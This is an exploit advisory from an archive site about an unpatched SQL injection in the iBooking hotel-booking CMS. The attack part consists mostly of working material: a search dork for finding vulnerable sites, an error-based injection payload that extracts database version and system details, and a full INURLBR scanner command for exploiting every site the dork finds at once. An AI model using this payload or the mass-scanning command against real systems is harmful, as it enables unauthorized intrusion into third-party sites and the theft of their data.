IBOOKING CMS - SQL INJECTION

2018.04.16
ro mohamad/so (RO) ro
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

(0day) IBOOKING CMS - SQL INJECTION From: INURL Brasil <inurlbr () gmail com> *# VENTOR: * www.ibooking.com.br *# Vulnerable versions:* ALL *# File: * filtro_faixa_etaria.php *# Parameter: * idPousada(GET) *# DORK: * intext:"Desenvolvido por ibooking" --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- *# Description* The vulnerable request is made through a javascript function found within /motor-de-reservas # Javascript code responsible for vulnerable request $.ajax({ type: "GET", url: "filtro_faixa_etaria.php", data: "qtde_quartos=1&idPousada=61", success: function(xml){ $("#filtro_faixa_etaria").html(xml); } }); *# URL Vulnerable:* http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61 *# POC:* http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION) *# Example:* http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a) *# Return print:* http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png *# Mass exploration using scanner INURLBR* # Download: https://github.com/googleinurl/SCANNER-INURLBR *# COMMAND* *# SETTING DORK DE PESQUISA* --dork 'YOU_DORK' *# USE* --dork 'intext:"Desenvolvido por ibooking"' *# SETTING OUTPUT FILE:* *# USE* -s 'ibooking.txt' *# SETTING STRING EXPLOIT GET:* --exploit-get 'EXPLOIT_GET' *# USE* --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' *# SETTING TYPE OF VALIDATION: * *# USE* -t 3 The third type combine both first and second types: Then, of course, it also establishes connection with the exploit through the get method. The string get set in parameter --exploit-get It is injected directly in the url: Exemplo: --exploit-get '/index.php?id=1&file=conect.php'INJEÇÃO URL: http://www.target.br/index.php?id=1&file=conect.php *# SETTING STRING OF VALIDATION:* Specify the string to be used as validation script: Exemplo: -a {string} Usando: -a '<title>hello world</title>' If the specific value is found in the target, it is considered vulnerable. - USE: -a 'INURLBR_VULN' The INURLBR_VULN value is passed in hexadecimal format in the exploit-get string *# COMMAND FULL:* php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN' m/so

References:

m/so


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top